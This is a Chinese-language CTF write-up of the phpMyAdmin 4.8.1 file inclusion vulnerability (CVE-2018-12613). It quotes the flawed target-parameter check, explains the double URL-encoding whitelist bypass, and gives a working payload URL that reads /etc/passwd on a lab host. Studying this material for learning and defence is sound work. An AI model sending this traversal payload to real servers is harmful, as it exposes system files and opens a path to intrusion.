该题考查cve-2018-12613-PhpMyadmin后台文件包含漏洞
使用御剑进行扫描发现phpmyadmin/目录,无需密码便可以进入
查看相关版本信息
百度一下发现phpmyadmin4.8.1版本文件包含漏洞,问题出在index.php的target参数位置
// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
&& is_string($_REQUEST['target'])
&& ! preg_match('/^index/', $_REQUEST['target'])
&& ! in_array($_REQUEST['target'], $target_blacklist)
&& Core::checkPageValidity($_REQUEST['target'])
) {
include $_REQUEST['target'];
exit;
}
$target_blacklist,target参数黑名单
$target_blacklist = array (
'import.php', 'export.php'
);
Core::checkPageValidity($_REQUEST['target']),Core类参数校验方法
public static function checkPageValidity(&$page, array $whitelist = [])
{
if (empty($whitelist)) {
$whitelist = self::$goto_whitelist;
}
if (! isset($page) || !is_string($page)) {
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
return false;
}
问题在于第23行的urldecode($page)方法,存在二次编码绕过
$_page = urldecode($page);
%25的url编码为% %3f的url编码为? %253f-->?
payLoad:
这里target参数只要不是黑名单中php文件就可以
http://725a4060-e628-4f9f-801a-e96075cbfca8.node3.buuoj.cn/phpmyadmin/index.php?target=db_datadict.php%253f../../../../../../etc/passwd
flag应该位于系统的根目录